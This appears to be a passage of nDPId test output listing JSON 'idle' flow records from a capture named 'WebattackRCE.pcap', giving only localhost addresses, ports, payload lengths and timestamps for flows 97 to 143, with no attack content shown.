-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7440000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7440000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7440000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7440000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7440000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7440000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":228,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 